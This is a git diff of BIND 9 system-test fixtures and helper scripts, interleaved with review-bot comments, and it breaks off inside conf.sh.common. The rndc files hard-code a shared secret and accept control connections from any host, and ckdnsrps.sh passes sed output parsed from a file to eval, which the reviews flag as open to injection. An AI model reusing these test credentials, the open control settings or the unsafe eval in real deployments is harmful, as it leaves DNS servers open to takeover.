diff --git a/bin/tests/system/checkzone/zones/ns-address-below-dname.db b/bin/tests/system/checkzone/zones/ns-address-below-dname.db
new file mode 100644
index 0000000..e15ad5c
--- /dev/null
+++ b/bin/tests/system/checkzone/zones/ns-address-below-dname.db
@@ -0,0 +1,22 @@
+; Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+;
+; SPDX-License-Identifier: MPL-2.0
+;
+; This Source Code Form is subject to the terms of the Mozilla Public
+; License, v. 2.0. If a copy of the MPL was not distributed with this
+; file, you can obtain one at https://mozilla.org/MPL/2.0/.
+;
+; See the COPYRIGHT file distributed with this work for additional
+; information regarding copyright ownership.
+
+$TTL 300
+example.com. SOA marka.isc.org. a.root.servers.nil. (
+ 2026 ; serial
+ 600 ; refresh
+ 600 ; retry
+ 1200 ; expire
+ 600 ; minimum
+ )
+example.com. DNAME example.net.
+example.com. NS ns.example.com
+ns.example.com. A 192.168.0.2
diff --git a/bin/tests/system/checkzone/zones/spf.db b/bin/tests/system/checkzone/zones/spf.db
new file mode 100644
index 0000000..9527b1b
--- /dev/null
+++ b/bin/tests/system/checkzone/zones/spf.db
@@ -0,0 +1,18 @@
+; Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+;
+; SPDX-License-Identifier: MPL-2.0
+;
+; This Source Code Form is subject to the terms of the Mozilla Public
+; License, v. 2.0. If a copy of the MPL was not distributed with this
+; file, you can obtain one at https://mozilla.org/MPL/2.0/.
+;
+; See the COPYRIGHT file distributed with this work for additional
+; information regarding copyright ownership.
+
+@ 0 IN SOA . . 0 0 0 0 0
+@ 0 IN NS .
+@ 0 IN TXT "v=spf1 -all"
+@ 0 IN SPF "v=spf1 -all"
+x 0 IN TXT "v=spf1"
+y 0 IN SPF "v=spf1"
+y 0 IN TXT "a non spf record"
diff --git a/bin/tests/system/checkzone/zones/test1.db b/bin/tests/system/checkzone/zones/test1.db
new file mode 100644
index 0000000..55669d7
--- /dev/null
+++ b/bin/tests/system/checkzone/zones/test1.db
@@ -0,0 +1,17 @@
+; Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+;
+; SPDX-License-Identifier: MPL-2.0
+;
+; This Source Code Form is subject to the terms of the Mozilla Public
+; License, v. 2.0. If a copy of the MPL was not distributed with this
+; file, you can obtain one at https://mozilla.org/MPL/2.0/.
+;
+; See the COPYRIGHT file distributed with this work for additional
+; information regarding copyright ownership.
+
+$TTL 600
+@ SOA ns hostmaster 2012010901 3600 1200 604800 1200
+ NS ns
+ns A 192.0.2.1
+
+addr1 A 10.53.0.1
diff --git a/bin/tests/system/checkzone/zones/test2.db b/bin/tests/system/checkzone/zones/test2.db
new file mode 100644
index 0000000..0cb1184
--- /dev/null
+++ b/bin/tests/system/checkzone/zones/test2.db
@@ -0,0 +1,18 @@
+; Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+;
+; SPDX-License-Identifier: MPL-2.0
+;
+; This Source Code Form is subject to the terms of the Mozilla Public
+; License, v. 2.0. If a copy of the MPL was not distributed with this
+; file, you can obtain one at https://mozilla.org/MPL/2.0/.
+;
+; See the COPYRIGHT file distributed with this work for additional
+; information regarding copyright ownership.
+
+$TTL 600
+@ SOA ns hostmaster 2012010902 3600 1200 604800 1200
+ NS ns
+ns A 192.0.2.1
+
+addr1 A 10.53.0.1
+addr2 A 10.53.0.2
diff --git a/bin/tests/system/checkzone/zones/warn.inherit.origin.db b/bin/tests/system/checkzone/zones/warn.inherit.origin.db
new file mode 100644
index 0000000..a348a8f
--- /dev/null
+++ b/bin/tests/system/checkzone/zones/warn.inherit.origin.db
@@ -0,0 +1,14 @@
+; Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+;
+; SPDX-License-Identifier: MPL-2.0
+;
+; This Source Code Form is subject to the terms of the Mozilla Public
+; License, v. 2.0. If a copy of the MPL was not distributed with this
+; file, you can obtain one at https://mozilla.org/MPL/2.0/.
+;
+; See the COPYRIGHT file distributed with this work for additional
+; information regarding copyright ownership.
+
+@ 0 IN SOA . . 0 0 0 0 0
+$ORIGIN @
+$INCLUDE "zones/inherit.db"
diff --git a/bin/tests/system/checkzone/zones/warn.inherited.owner.db b/bin/tests/system/checkzone/zones/warn.inherited.owner.db
new file mode 100644
index 0000000..dbbd9d1
--- /dev/null
+++ b/bin/tests/system/checkzone/zones/warn.inherited.owner.db
@@ -0,0 +1,13 @@
+; Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+;
+; SPDX-License-Identifier: MPL-2.0
+;
+; This Source Code Form is subject to the terms of the Mozilla Public
+; License, v. 2.0. If a copy of the MPL was not distributed with this
+; file, you can obtain one at https://mozilla.org/MPL/2.0/.
+;
+; See the COPYRIGHT file distributed with this work for additional
+; information regarding copyright ownership.
+
+@ 0 IN SOA . . 0 0 0 0 0
+$INCLUDE "zones/inherit.db" @
diff --git a/bin/tests/system/ckdnsrps.sh b/bin/tests/system/ckdnsrps.sh
new file mode 100644
index 0000000..99ccb6c
--- /dev/null
+++ b/bin/tests/system/ckdnsrps.sh
@@ -0,0 +1,168 @@
+#!/bin/sh
+
+# Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+#
+# SPDX-License-Identifier: MPL-2.0
+#
+# This Source Code Form is subject to the terms of the Mozilla Public
+# License, v. 2.0. If a copy of the MPL was not distributed with this
+# file, you can obtain one at https://mozilla.org/MPL/2.0/.
+#
+# See the COPYRIGHT file distributed with this work for additional
+# information regarding copyright ownership.
+
+set -e
+
+# Say on stdout whether to test DNSRPS
+# and create dnsrps.conf and dnsrps-slave.conf
+# Note that dnsrps.conf and dnsrps-slave.conf are included in named.conf
+# and differ from dnsrpz.conf which is used by dnsrpzd.
+
+
+SYSTEMTESTTOP=..
+. $SYSTEMTESTTOP/conf.sh
+
+DNSRPS_CMD=../rpz/dnsrps
+
+AS_NS=
+TEST_DNSRPS=
+MCONF=dnsrps.conf
+SCONF=dnsrps-slave.conf
+USAGE="$0: [-xAD] [-M dnsrps.conf] [-S dnsrps-slave.conf]"
+while getopts "xADM:S:" c; do
+ case $c in
+ x) set -x; DEBUG=-x;;
+ A) AS_NS=yes;;
+ D) TEST_DNSRPS=yes;;
+ M) MCONF="$OPTARG";;
+ S) SCONF="$OPTARG";;
+ *) echo "$USAGE" 1>&2; exit 1;;
+ esac
+done
+shift `expr $OPTIND - 1 || true`
+if [ "$#" -ne 0 ]; then
+ echo "$USAGE" 1>&2
+ exit 1
+fi
+
+# erase any existing conf files
+cat /dev/null > $MCONF
+cat /dev/null > $SCONF
+
+add_conf () {
+ echo "$*" >>$MCONF
+ echo "$*" >>$SCONF
+}
+
+if ! $FEATURETEST --enable-dnsrps; then
+ if [ -n "$TEST_DNSRPS" ]; then
+ add_conf "## DNSRPS disabled at compile time"
+ fi
+ add_conf "#skip"
+ exit 0
+fi
+
+if [ -z "$TEST_DNSRPS" ]; then
+ add_conf "## testing with native RPZ"
+ add_conf '#skip'
+ exit 0
+else
+ add_conf "## testing with DNSRPS"
+fi
+
+if [ ! -x "$DNSRPS_CMD" ]; then
+ add_conf "## make $DNSRPS_CMD to test DNSRPS"
+ add_conf '#skip'
+ exit 0
+fi
+
+if $DNSRPS_CMD -a >/dev/null; then :
+else
+ add_conf "## DNSRPS provider library is not available"
+ add_conf '#skip'
+ exit 0
+fi
+
+CMN=" dnsrps-options { dnsrpzd-conf ../dnsrpzd.conf
+ dnsrpzd-sock ../dnsrpzd.sock
+ dnsrpzd-rpzf ../dnsrpzd.rpzf
+ dnsrpzd-args '-dddd -L stdout'
+ log-level 3"
+
+MASTER="$CMN"
+if [ -n "$AS_NS" ]; then
+ MASTER="$MASTER
+ qname-as-ns yes
+ ip-as-ns yes"
+fi
+
+# write dnsrps settings for master resolver
+cat <<EOF >>$MCONF
+$MASTER };
+EOF
+
+# write dnsrps settings for resolvers that should not start dnsrpzd
+cat <<EOF >>$SCONF
+$CMN
+ dnsrpzd '' }; # do not start dnsrpzd
+EOF
+
+
+# DNSRPS is available.
+# The test should fail if the license is bad.
+add_conf "dnsrps-enable yes;"
+
+# Use alt-dnsrpzd-license.conf if it exists
+CUR_L=dnsrpzd-license-cur.conf
+ALT_L=alt-dnsrpzd-license.conf
+# try ../rpz/alt-dnsrpzd-license.conf if alt-dnsrpzd-license.conf does not exist
+[ -s $ALT_L ] || ALT_L=../rpz/alt-dnsrpzd-license.conf
+if [ -s $ALT_L ]; then
+ SRC_L=$ALT_L
+ USE_ALT=
+else
+ SRC_L=../rpz/dnsrpzd-license.conf
+ USE_ALT="## consider installing alt-dnsrpzd-license.conf"
+fi
+cp $SRC_L $CUR_L
+
+# parse $CUR_L for the license zone name, master IP addresses, and optional
+# transfer-source IP addresses
+eval `sed -n -e 'y/ABCDEFGHIJKLMNOPQRSTUVWXYZ/abcdefghijklmnopqrstuvwxyz/'\
+ -e 's/.*zone *\([-a-z0-9]*.license.fastrpz.com\).*/NAME=\1/p' \
+ -e 's/.*farsight_fastrpz_license *\([0-9.]*\);.*/IPV4=\1/p' \
+ -e 's/.*farsight_fastrpz_license *\([0-9a-f:]*\);.*/IPV6=\1/p' \
+ -e 's/.*transfer-source *\([0-9.]*\);.*/TS4=-b\1/p' \
+ -e 's/.*transfer-source *\([0-9a-f:]*\);.*/TS6=-b\1/p' \
+ -e 's/.*transfer-source-v6 *\([0-9a-f:]*\);.*/TS6=-b\1/p' \
+ $CUR_L`
+if [ -z "$NAME" ]; then
+ add_conf "## no DNSRPS tests; no license domain name in $SRC_L"
+ add_conf '#fail'
+ exit 0
+fi
+if [ -z "$IPV4" ]; then
+ IPV4=license1.fastrpz.com
+ TS4=
+fi
+if [ -z "$IPV6" ]; then
+ IPV6=license1.fastrpz.com
+ TS6=
+fi
+
+# This TSIG key is common and NOT a secret
+KEY='hmac-sha256:farsight_fastrpz_license:f405d02b4c8af54855fcebc1'
+
+# Try IPv4 and then IPv6 to deal with IPv6 tunnel and connectivity problems
+if `$DIG -4 -t axfr -y$KEY $TS4 $NAME @$IPV4 \
+ | grep -i "^$NAME.*TXT" >/dev/null`; then
+ exit 0
+fi
+if `$DIG -6 -t axfr -y$KEY $TS6 $NAME @$IPV6 \
+ | grep -i "^$NAME.*TXT" >/dev/null`; then
+ exit 0
+fi
+
+add_conf "## DNSRPS lacks a valid license via $SRC_L"
+[ -z "$USE_ALT" ] || add_conf "$USE_ALT"
+add_conf '#fail'
diff --git a/bin/tests/system/cleanall.sh b/bin/tests/system/cleanall.sh
new file mode 100644
index 0000000..e5cc477
--- /dev/null
+++ b/bin/tests/system/cleanall.sh
@@ -0,0 +1,37 @@
+#!/bin/sh
+
+# Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+#
+# SPDX-License-Identifier: MPL-2.0
+#
+# This Source Code Form is subject to the terms of the Mozilla Public
+# License, v. 2.0. If a copy of the MPL was not distributed with this
+# file, you can obtain one at https://mozilla.org/MPL/2.0/.
+#
+# See the COPYRIGHT file distributed with this work for additional
+# information regarding copyright ownership.
+
+#
+# Clean up after system tests.
+#
+
+SYSTEMTESTTOP=.
+. $SYSTEMTESTTOP/conf.sh
+
+
+find . -type f \( \
+ -name '*~' -o -name 'core' -o -name '*.core' \
+ -o -name '*.log' -o -name '*.pid' -o -name '*.keyset' \
+ -o -name named.run -o -name ans.run \
+ -o -name '*-valgrind-*.log' \) -print | xargs rm -f
+
+status=0
+
+rm -f $SYSTEMTESTTOP/random.data
+
+for d in $SUBDIRS
+do
+ test ! -f $d/clean.sh || ( cd $d && $SHELL clean.sh )
+ rm -f test.output.$d
+ test -d $d && find $d -type d -exec rmdir '{}' \; 2> /dev/null
+done
diff --git a/bin/tests/system/cleanpkcs11.sh b/bin/tests/system/cleanpkcs11.sh
new file mode 100644
index 0000000..ff8acd0
--- /dev/null
+++ b/bin/tests/system/cleanpkcs11.sh
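Review bot: The text that the `sed` pipeline hands to `eval` in ckdnsrps.sh is less constrained than its character classes suggest, because the dots in `\([-a-z0-9]*.license.fastrpz.com\)` are unescaped and each matches any character, so the captured `NAME=` value can carry a shell metacharacter from the license file into `eval`. Escaping them, `-e 's/.*zone *\([-a-z0-9]*\.license\.fastrpz\.com\).*/NAME=\1/p'`, keeps the capture to hostname characters. The same `$NAME` is later passed unquoted to `$DIG` and used as a `grep` pattern, so the tighter capture helps there too. Separately, `$MCONF`, `$SCONF`, `$ALT_L`, `$SRC_L` and `$CUR_L` are expanded unquoted in redirections, `[ -s … ]` and `cp`, so a `-M` or `-S` path containing whitespace would not be handled as one file name; quoting them (`> "$MCONF"`) costs nothing.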
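Review bot: The cleanup pipeline in cleanall.sh, `find . … -print | xargs rm -f`, re-parses file names on whitespace and quote characters, so a matching file whose name contains a space, quote or newline is either skipped or makes `rm` act on a path other than the one `find` matched. Letting `find` run the command removes the parsing step: replace `-print | xargs rm -f` with `-exec rm -f {} +`. In the same script `status=0` is assigned but not read in the visible lines, and `$d` is unquoted in the loop body (`cd $d`, `find $d`).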
@@ -0,0 +1,18 @@
+#!/bin/sh
+
+# Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+#
+# SPDX-License-Identifier: MPL-2.0
+#
+# This Source Code Form is subject to the terms of the Mozilla Public
+# License, v. 2.0. If a copy of the MPL was not distributed with this
+# file, you can obtain one at https://mozilla.org/MPL/2.0/.
+#
+# See the COPYRIGHT file distributed with this work for additional
+# information regarding copyright ownership.
+
+. "$SYSTEMTESTTOP/conf.sh"
+
+PK11DELBIN=$(echo "$PK11DEL" | awk '{ print $1 }')
+
+[ -x "$PK11DELBIN" ] && $PK11DEL -w0 > /dev/null 2>&1
diff --git a/bin/tests/system/common/controls.conf.in b/bin/tests/system/common/controls.conf.in
new file mode 100644
index 0000000..3712885
--- /dev/null
+++ b/bin/tests/system/common/controls.conf.in
@@ -0,0 +1,22 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+key rndc_key {
+ secret "1234abcd8765";
+ algorithm hmac-sha256;
+};
+
+controls {
+ inet 10.53.0.2 port @CONTROLPORT@ allow { any; } keys { rndc_key; };
+};
+
diff --git a/bin/tests/system/common/rndc.conf b/bin/tests/system/common/rndc.conf
new file mode 100644
index 0000000..b887ec3
--- /dev/null
+++ b/bin/tests/system/common/rndc.conf
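Review bot: `. "$SYSTEMTESTTOP/conf.sh"` in cleanpkcs11.sh depends on the caller having set `SYSTEMTESTTOP`; unlike cleanall.sh and ckdnsrps.sh this script never assigns it, so with the variable unset the shell sources `/conf.sh` from the filesystem root. `. "${SYSTEMTESTTOP:?}/conf.sh"` makes the script stop with an error instead of reading an unintended file. The last line, `[ -x "$PK11DELBIN" ] && $PK11DEL -w0 > /dev/null 2>&1`, also leaves the script with a non-zero exit status when the binary is absent; if that is not intended, an `if [ -x "$PK11DELBIN" ]; then … fi` form returns 0 in that case.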
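Review bot: The `controls` block in controls.conf.in accepts rndc connections from any source (`allow { any; }`) and authenticates them with the fixed secret `1234abcd8765`, and nothing in the file says this is a test-only credential. The same secret is repeated in common/rndc.conf and common/rndc.key, which have the same gap. A comment above each `key rndc_key` statement, for example `/* Fixed key shared by the system tests; do not reuse outside the test harness. */`, would document that the value is a fixture and keep it from being copied into a deployed configuration.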
@@ -0,0 +1,21 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+options {
+ default-key "rndc_key";
+};
+
+key rndc_key {
+ algorithm hmac-sha256;
+ secret "1234abcd8765";
+};
diff --git a/bin/tests/system/common/rndc.key b/bin/tests/system/common/rndc.key
new file mode 100644
index 0000000..3ef41c3
--- /dev/null
+++ b/bin/tests/system/common/rndc.key
@@ -0,0 +1,15 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+key rndc_key {
+ secret "1234abcd8765";
+ algorithm hmac-sha256;
+};
diff --git a/bin/tests/system/common/root.hint b/bin/tests/system/common/root.hint
new file mode 100644
index 0000000..e0f186c
--- /dev/null
+++ b/bin/tests/system/common/root.hint
@@ -0,0 +1,14 @@
+; Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+;
+; SPDX-License-Identifier: MPL-2.0
+;
+; This Source Code Form is subject to the terms of the Mozilla Public
+; License, v. 2.0. If a copy of the MPL was not distributed with this
+; file, you can obtain one at https://mozilla.org/MPL/2.0/.
+;
+; See the COPYRIGHT file distributed with this work for additional
+; information regarding copyright ownership.
+
+$TTL 999999
+. IN NS a.root-servers.nil.
+a.root-servers.nil. IN A 10.53.0.1
diff --git a/bin/tests/system/conf.sh.common b/bin/tests/system/conf.sh.common
new file mode 100644
index 0000000..e87acca
--- /dev/null
+++ b/bin/tests/system/conf.sh.common
@@ -0,0 +1,744 @@ +#!/bin/sh +# +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +testsock6() { + if test -n "$PERL" && $PERL -e "use IO::Socket::INET6;" 2> /dev/null + then + $PERL "$TOP/bin/tests/system/testsock6.pl" "$@" + else + false + fi +} + +export LANG=C + +. ${TOP}/version + +# +# Common lists of system tests to run. +# +# The following tests are hard-coded to use ports 5300 and 9953. For +# this reason, these must be run sequentially. +# +# Sequential tests that only run on unix/linux should be added to +# SEQUENTIAL_UNIX in conf.sh.in; those that only run on windows should +# be added to SEQUENTIAL_WINDOWS in conf.sh.win32. +# +SEQUENTIAL_COMMON="ecdsa eddsa tkey" + +# +# These tests can use ports assigned by the caller (other than 5300 +# and 9953). Because separate blocks of ports can be used for teach +# test, these tests can be run in parallel. +# +# Parallel tests that only run on unix/linux should be added to +# PARALLEL_UNIX in conf.sh.in; those that only run on windows should +# be added to PARALLEL_WINDOWS in conf.sh.win32. +# +# Note: some of the longer-running tests such as serve-stale and +# rpzrecurse are scheduled first, in order to get more benefit from +# parallelism. 
+# +PARALLEL_COMMON="dnssec rpzrecurse serve-stale dupsigs \ +acl \ +additional \ +addzone \ +allow-query \ +auth \ +autosign \ +builtin \ +cacheclean \ +case \ +catz \ +cds \ +chain \ +checkconf \ +checkds \ +checknames \ +checkzone \ +database \ +digdelv \ +dlz \ +dlzexternal \ +dns64 \ +dscp \ +dsdigest \ +dyndb \ +ednscompliance \ +emptyzones \ +fetchlimit \ +filter-aaaa \ +formerr \ +forward \ +geoip2 \ +glue \ +idna \ +inline \ +integrity \ +ixfr \ +journal \ +kasp \ +keepalive \ +keymgr2kasp \ +legacy \ +limits \ +masterfile \ +masterformat \ +metadata \ +mirror \ +mkeys \ +names \ +notify \ +nsec3 \ +nslookup \ +nsupdate \ +nzd2nzf \ +padding \ +pending \ +pipelined \ +qmin \ +reclimit \ +redirect \ +resolver \ +rndc \ +rootkeysentinel \ +rpz \ +rrchecker \ +rrl \ +rrsetorder \ +rsabigexponent \ +runtime \ +sfcache \ +shutdown \ +smartsign \ +sortlist \ +spf \ +staticstub \ +statistics \ +statschannel \ +stress \ +stub \ +synthfromdnssec \ +timeouts \ +tcp \ +tools \ +tsig \ +tsiggss \ +ttl \ +unknown \ +upforwd \ +verify \ +views \ +wildcard \ +xfer \ +xferquota \ +zero \ +zonechecks" + +# +# Set up color-coded test output +# +if [ ${SYSTEMTEST_FORCE_COLOR:-0} -eq 1 ] || test -t 1 && type tput > /dev/null 2>&1 && tput setaf 7 > /dev/null 2>&1 ; then + export COLOR_END=`tput setaf 4` # blue + export COLOR_FAIL=`tput setaf 1` # red + export COLOR_INFO=`tput bold` # bold + export COLOR_NONE=`tput sgr0` + export COLOR_PASS=`tput setaf 2` # green + export COLOR_START=`tput setaf 4` # blue + export COLOR_WARN=`tput setaf 3` # yellow +else + # set to empty strings so printf succeeds + export COLOR_END='' + export COLOR_FAIL='' + export COLOR_INFO='' + export COLOR_NONE='' + export COLOR_PASS='' + export COLOR_START='' + export COLOR_WARN='' +fi + +export SYSTESTDIR="`basename $PWD`" + +if type printf > /dev/null 2>&1 +then + echofail () { + printf "${COLOR_FAIL}%s${COLOR_NONE}\n" "$*" + } + echowarn () { + printf "${COLOR_WARN}%s${COLOR_NONE}\n" "$*" + } + 
echopass () { + printf "${COLOR_PASS}%s${COLOR_NONE}\n" "$*" + } + echoinfo () { + printf "${COLOR_INFO}%s${COLOR_NONE}\n" "$*" + } + echostart () { + printf "${COLOR_START}%s${COLOR_NONE}\n" "$*" + } + echoend () { + printf "${COLOR_END}%s${COLOR_NONE}\n" "$*" + } + echo_i() { + printf '%s\n' "$*" | while IFS= read -r __LINE ; do + echoinfo "I:$SYSTESTDIR:$__LINE" + done + } + + echo_ic() { + printf '%s\n' "$*" | while IFS= read -r __LINE ; do + echoinfo "I:$SYSTESTDIR: $__LINE" + done + } + + echo_d() { + printf '%s\n' "$*" | while IFS= read -r __LINE ; do + echoinfo "D:$SYSTESTDIR:$__LINE" + done + } +else + echofail () { + echo "$*" + } + echowarn () { + echo "$*" + } + echopass () { + echo "$*" + } + echoinfo () { + echo "$*" + } + echostart () { + echo "$*" + } + echoend () { + echo "$*" + } + + echo_i() { + echo "$@" | while IFS= read -r __LINE ; do + echoinfo "I:$SYSTESTDIR:$__LINE" + done + } + + echo_ic() { + echo "$@" | while IFS= read -r __LINE ; do + echoinfo "I:$SYSTESTDIR: $__LINE" + done + } + + echo_d() { + echo "$@" | while IFS= read -r __LINE ; do + echoinfo "D:$SYSTESTDIR:$__LINE" + done + } +fi + +cat_i() { + while IFS= read -r __LINE ; do + echoinfo "I:$SYSTESTDIR:$__LINE" + done +} + +cat_d() { + while IFS= read -r __LINE ; do + echoinfo "D:$SYSTESTDIR:$__LINE" + done +} + +digcomp() { + output=`$PERL $SYSTEMTESTTOP/digcomp.pl "$@"` + result=$? + [ -n "$output" ] && { echo "digcomp failed:"; echo "$output"; } | cat_i + return $result +} + +start_server() { + $PERL "$TOP_SRCDIR/bin/tests/system/start.pl" "$SYSTESTDIR" "$@" +} + +stop_server() { + $PERL "$TOP_SRCDIR/bin/tests/system/stop.pl" "$SYSTESTDIR" "$@" +} + +send() { + $PERL "$TOP_SRCDIR/bin/tests/system/send.pl" "$@" +} + +# +# Useful variables in test scripts +# + +# The following script sets the following algorithm-related variables. These +# are selected randomly at runtime from a list of supported algorithms. 
The +# randomization is deterministic and remains stable for a period of time for a +# given platform. +# +# Default algorithm for testing. +# DEFAULT_ALGORITHM +# DEFAULT_ALGORITHM_NUMBER +# DEFAULT_BITS +# +# This is an alternative algorithm for test cases that require more than one +# algorithm (for example algorithm rollover). Must be different from +# DEFAULT_ALGORITHM. +# ALTERNATIVE_ALGORITHM +# ALTERNATIVE_ALGORITHM_NUMBER +# ALTERNATIVE_BITS +# +# This is an algorithm that is used for tests against the "disable-algorithms" +# configuration option. Must be different from above algorithms. +# DISABLED_ALGORITHM +# DISABLED_ALGORITHM_NUMBER +# DISABLED_BITS +# +# There are multiple algoritms sets to choose from (see get_algorithms.py). To +# override the default choice, set the ALGORITHM_SET env var (see mkeys system +# test for example). +if test -x "$PYTHON" && test -x "$KEYGEN"; then + eval "$($PYTHON "$TOP_SRCDIR/bin/tests/system/get_algorithms.py")" +else + # 9.16 workarounds + # - for ./configure which calls bin/tests/system/cleanall.sh, which + # includes this file before $KEYGEN is compiled + # - for our Windows CI which lacks Python + DEFAULT_ALGORITHM=ECDSAP256SHA256 + DEFAULT_ALGORITHM_NUMBER=13 + DEFAULT_BITS=256 + ALTERNATIVE_ALGORITHM=RSASHA256 + ALTERNATIVE_ALGORITHM_NUMBER=8 + ALTERNATIVE_BITS=1280 + DISABLED_ALGORITHM=ECDSAP384SHA384 + DISABLED_ALGORITHM_NUMBER=14 + DISABLED_BITS=384 +fi + +# Default HMAC algorithm. +export DEFAULT_HMAC=hmac-sha256 + +# +# Useful functions in test scripts +# + +# assert_int_equal: compare two integer variables, $1 and $2 +# +# If $1 and $2 are equal, return 0; if $1 and $2 are not equal, report +# the error using the description of the tested variable provided in $3 +# and return 1. 
+assert_int_equal() { + found="$1" + expected="$2" + description="$3" + + if [ "${expected}" -ne "${found}" ]; then + echo_i "incorrect ${description}: got ${found}, expected ${expected}" + return 1 + fi + + return 0 +} + +# keyfile_to_keys_section: helper function for keyfile_to_*_keys() which +# converts keyfile data into a key-style trust anchor configuration +# section using the supplied parameters +keyfile_to_keys() { + section_name=$1 + key_prefix=$2 + shift + shift + echo "$section_name {" + for keyname in $*; do + awk '!/^; /{ + printf "\t\""$1"\" " + printf "'"$key_prefix "'" + printf $4 " " $5 " " $6 " \"" + for (i=7; i<=NF; i++) printf $i + printf "\";\n" + }' $keyname.key + done + echo "};" +} + +# keyfile_to_dskeys_section: helper function for keyfile_to_*_dskeys() +# converts keyfile data into a DS-style trust anchor configuration +# section using the supplied parameters +keyfile_to_dskeys() { + section_name=$1 + key_prefix=$2 + shift + shift + echo "$section_name {" + for keyname in $*; do + $DSFROMKEY $keyname.key | \ + awk '!/^; /{ + printf "\t\""$1"\" " + printf "'"$key_prefix "'" + printf $4 " " $5 " " $6 " \"" + for (i=7; i<=NF; i++) printf $i + printf "\";\n" + }' + done + echo "};" +} + +# keyfile_to_trusted_keys: convert key data contained in the keyfile(s) +# provided to a "trust-keys" section suitable for including in a +# resolver's configuration file +keyfile_to_trusted_keys() { + keyfile_to_keys "trusted-keys" "" $* +} + +# keyfile_to_static_keys: convert key data contained in the keyfile(s) +# provided to a *static-key* "trust-anchors" section suitable for including in +# a resolver's configuration file +keyfile_to_static_keys() { + keyfile_to_keys "trust-anchors" "static-key" $* +} + +# keyfile_to_initial_keys: convert key data contained in the keyfile(s) +# provided to an *initial-key* "trust-anchors" section suitable for including +# in a resolver's configuration file +keyfile_to_initial_keys() { + keyfile_to_keys "trust-anchors" 
"initial-key" $* +} + +# keyfile_to_static_ds_keys: convert key data contained in the keyfile(s) +# provided to a *static-ds* "trust-anchors" section suitable for including in a +# resolver's configuration file +keyfile_to_static_ds() { + keyfile_to_dskeys "trust-anchors" "static-ds" $* +} + +# keyfile_to_initial_ds_keys: convert key data contained in the keyfile(s) +# provided to an *initial-ds* "trust-anchors" section suitable for including +# in a resolver's configuration file +keyfile_to_initial_ds() { + keyfile_to_dskeys "trust-anchors" "initial-ds" $* +} + +# keyfile_to_key_id: convert a key file name to a key ID +# +# For a given key file name (e.g. "Kexample.+013+06160") provided as $1, +# print the key ID with leading zeros stripped ("6160" for the +# aforementioned example). +keyfile_to_key_id() { + echo "$1" | sed "s/.*+0\{0,4\}//" +} + +# private_type_record: write a private type record recording the state of the +# signing process +# +# For a given zone ($1), algorithm number ($2) and key file ($3), print the +# private type record with default type value of 65534, indicating that the +# signing process for this key is completed. +private_type_record() { + _zone=$1 + _algorithm=$2 + _keyfile=$3 + + _id=$(keyfile_to_key_id "$_keyfile") + + printf "%s. 0 IN TYPE65534 %s 5 %02x%04x0000\n" "$_zone" "\\#" "$_algorithm" "$_id" +} + +# nextpart*() - functions for reading files incrementally +# +# These functions aim to facilitate looking for (or waiting for) +# messages which may be logged more than once throughout the lifetime of +# a given named instance by outputting just the part of the file which +# has been appended since the last time we read it. +# +# Calling some of these functions causes temporary *.prev files to be +# created that need to be cleaned up manually (usually by a given system +# test's clean.sh script). 
+# +# Note that unlike other nextpart*() functions, nextpartread() is not +# meant to be directly used in system tests; its sole purpose is to +# reduce code duplication below. +# +# A quick usage example: +# +# $ echo line1 > named.log +# $ echo line2 >> named.log +# $ nextpart named.log +# line1 +# line2 +# $ echo line3 >> named.log +# $ nextpart named.log +# line3 +# $ nextpart named.log +# $ echo line4 >> named.log +# $ nextpartpeek named.log +# line4 +# $ nextpartpeek named.log +# line4 +# $ nextpartreset named.log +# $ nextpartpeek named.log +# line1 +# line2 +# line3 +# line4 +# $ nextpart named.log +# line1 +# line2 +# line3 +# line4 +# $ nextpart named.log +# $ + +# nextpartreset: reset the marker used by nextpart() and nextpartpeek() +# so that it points to the start of the given file +nextpartreset() { + echo "0" > $1.prev +} + +# nextpartread: read everything that's been appended to a file since the +# last time nextpart() was called and print it to stdout, print the +# total number of lines read from that file so far to file descriptor 3 +nextpartread() { + [ -f $1.prev ] || nextpartreset $1 + prev=`cat $1.prev` + awk "NR > $prev "'{ print } + END { print NR > "/dev/stderr" }' $1 2>&3 +} + +# nextpart: read everything that's been appended to a file since the +# last time nextpart() was called +nextpart() { + nextpartread $1 3> $1.prev.tmp + mv $1.prev.tmp $1.prev +} + +# nextpartpeek: read everything that's been appended to a file since the +# last time nextpart() was called +nextpartpeek() { + nextpartread $1 3> /dev/null +} + +# _search_log: look for message $1 in file $2 with nextpart(). +_search_log() ( + msg="$1" + file="$2" + nextpart "$file" | grep -F -e "$msg" > /dev/null +) + +# _search_log_peek: look for message $1 in file $2 with nextpartpeek(). +_search_log_peek() ( + msg="$1" + file="$2" + nextpartpeek 